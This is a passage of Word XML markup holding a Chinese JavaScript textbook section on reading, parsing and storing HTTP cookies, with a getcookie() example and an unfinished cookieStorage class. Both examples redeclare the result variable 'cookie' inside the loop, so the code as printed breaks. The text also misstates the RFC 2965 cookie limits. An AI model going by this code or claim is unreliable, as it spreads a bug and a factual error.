        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>Script</w:t>
      </w:r>
      <w:r>
        <w:t>表达式来读取</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性的时候，其返回的值是一个字符串，该字符串都是由一系列名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对组成，不同名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对之间通过</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>分号和空格</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>分开，其内容包含了所有作用在当前文档的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。但是，它并不包含其他设置的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性。通过</w:t>
      </w:r>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以获取</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值，但是为了更好地查看</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值，一般会采用</w:t>
      </w:r>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值中的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对都分离出来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值从</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性分离出来之后，必须要采用相应的解码方式（取决于之前存储</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值时</w:t>
      </w:r>
      <w:r>
        <w:t>采用的编码方式），把值还原出来。比如，先采用</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>方法把</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值解码出来，之后再利用</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>方法转化成</w:t>
      </w:r>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-1</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>getcookie()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，该函数将</w:t>
      </w:r>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值解析出来，将对应的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对存储到一个对象中，函数最后返回该对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-1</w:t>
      </w:r>
      <w:r>
        <w:t>：解析</w:t>
      </w:r>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值以名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对组成的一个对象返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>假设存储</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值的时候是采用</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>函数编码的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getcookie(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cookie={};//</w:t>
      </w:r>
      <w:r>
        <w:t>初始化最后要返回的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var all=document.cookie;//</w:t>
      </w:r>
      <w:r>
        <w:t>在一个大写字符串中获取所有的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(all==="")//</w:t>
      </w:r>
      <w:r>
        <w:t>如果该</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为空字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return cookie;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个空对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var list=all.split(";");//</w:t>
      </w:r>
      <w:r>
        <w:t>分离出名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>list.len</w:t>
      </w:r>
      <w:r>
        <w:t>gth;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历每个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cookie=list[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=cookie.indexOf("=");//</w:t>
      </w:r>
      <w:r>
        <w:t>查找第一个</w:t>
      </w:r>
      <w:r>
        <w:t>"="</w:t>
      </w:r>
      <w:r>
        <w:t>符号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=cookie.substring(0,p);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=cookie.substring(p+1);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>对应的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value=decodeURIComponent(value);//</w:t>
      </w:r>
      <w:r>
        <w:t>对其值进行解码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cookie[name]=value;//</w:t>
      </w:r>
      <w:r>
        <w:t>将名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对存储到对象中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>cookie;</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514" w:name="20_2_4_cookieDe_Ju_Xian_Xing_"/>
      <w:r>
        <w:t>20.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的局限性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="514"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的设计初衷是给服务端脚本用来存储少量数据的，该数据会在每次请求一个相关的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>时传递到服务器中。</w:t>
      </w:r>
      <w:r>
        <w:t>RFC 2965</w:t>
      </w:r>
      <w:r>
        <w:t>鼓励浏览器供应商供应商对</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的数目和大小不做限制。可是，要知</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>道，该标准不允许浏览器保存超过</w:t>
      </w:r>
      <w:r>
        <w:t>300</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>，为每个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器保存的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>数不能超过</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>个（是对整个服务器而言，而不仅仅指服务器上的页面和站点），而且，每个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>保存的数据不能超过</w:t>
      </w:r>
      <w:r>
        <w:t>4KB</w:t>
      </w:r>
      <w:r>
        <w:t>（即名字和值的总量不能超过</w:t>
      </w:r>
      <w:r>
        <w:t>4KB</w:t>
      </w:r>
      <w:r>
        <w:t>的限制）。实际上，现代浏</w:t>
      </w:r>
      <w:r>
        <w:t>览器允许</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>总数超过</w:t>
      </w:r>
      <w:r>
        <w:t>300</w:t>
      </w:r>
      <w:r>
        <w:t>个，但是部分浏览器对单个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>大小仍然有</w:t>
      </w:r>
      <w:r>
        <w:t>4KB</w:t>
      </w:r>
      <w:r>
        <w:t>的限制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="515" w:name="20_2_5_cookieXiang_Guan_De_Cun_Chu_"/>
      <w:r>
        <w:t>20.2.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>相关的存储</w:t>
      </w:r>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何实现基于</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的一系列存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>方法。该例定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>cookieStorage</w:t>
      </w:r>
      <w:r>
        <w:t>函数（被实例化的时候具有构造函数特性），通过将</w:t>
      </w:r>
      <w:r>
        <w:t>max-age</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t>属性传递给该构造函数，就会返回一个对象，然后就可以像使用</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>一样来使用这个对象了。但是要注意的是，该例并没有实现存储事件，因此，当设置和查询</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性的时候，不会实现自动保存和获取对应的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>20-2</w:t>
      </w:r>
      <w:r>
        <w:t>：实现基于</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*cookieStorage.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>本类实现像</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>一样的存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，不同的是，基于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP cookie</w:t>
      </w:r>
      <w:r>
        <w:t>实现它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function cookieStorage(maxage,path){//</w:t>
      </w:r>
      <w:r>
        <w:t>两个参数分别代表存储有效期和作用域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获取一个存储全部</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>信息的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>cookie=(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>类似之前介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>getcookie()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cookie={};//</w:t>
      </w:r>
      <w:r>
        <w:t>该对象最终会返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var all=document.cookie;//</w:t>
      </w:r>
      <w:r>
        <w:t>以大字符串的形式获取所有</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(all==="")//</w:t>
      </w:r>
      <w:r>
        <w:t>如果该属性为空字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return cookie;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个空对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var list=all.split(";");//</w:t>
      </w:r>
      <w:r>
        <w:t>分离出名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>list.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历每个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cookie=list</w:t>
      </w:r>
      <w:r>
        <w:t>[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=cookie.indexOf("=");//</w:t>
      </w:r>
      <w:r>
        <w:t>查找第一个</w:t>
      </w:r>
      <w:r>
        <w:t>"="</w:t>
      </w:r>
      <w:r>
        <w:t>符号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=cookie.substring(0,p);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=cookie.substring(p+1);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>对应的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value=decodeURIComponent(value);//</w:t>
      </w:r>
      <w:r>
        <w:t>对其值进行解码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cookie[name]=value;//</w:t>
      </w:r>
      <w:r>
        <w:t>将名值对存储到对象中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}());//</w:t>
      </w:r>
      <w:r>
        <w:t>将所有</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的名字存储到一个数组中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>va</w:t>
      </w:r>
      <w:r>
        <w:t>r keys=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var key in cookie)keys.push(key);//</w:t>
      </w:r>
      <w:r>
        <w:t>现在定义存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>公共的属性和方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>存储的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.length=keys.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的名字</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>越界则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.key=function(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>0||n</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=keys.length)return null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return keys[n];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回指定名字的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>如果不存在则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.getItem</w:t>
      </w:r>
      <w:r>
        <w:t>=function(name){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return cookie[name]||null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.setItem=function(key,value){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!(key in cookie)){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果要存储的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>还不存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>keys.push(key);//</w:t>
      </w:r>
      <w:r>
        <w:t>将指定的名字加入到存储所有</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>名的数组中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.length++;//cookie</w:t>
      </w:r>
      <w:r>
        <w:t>个数加一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
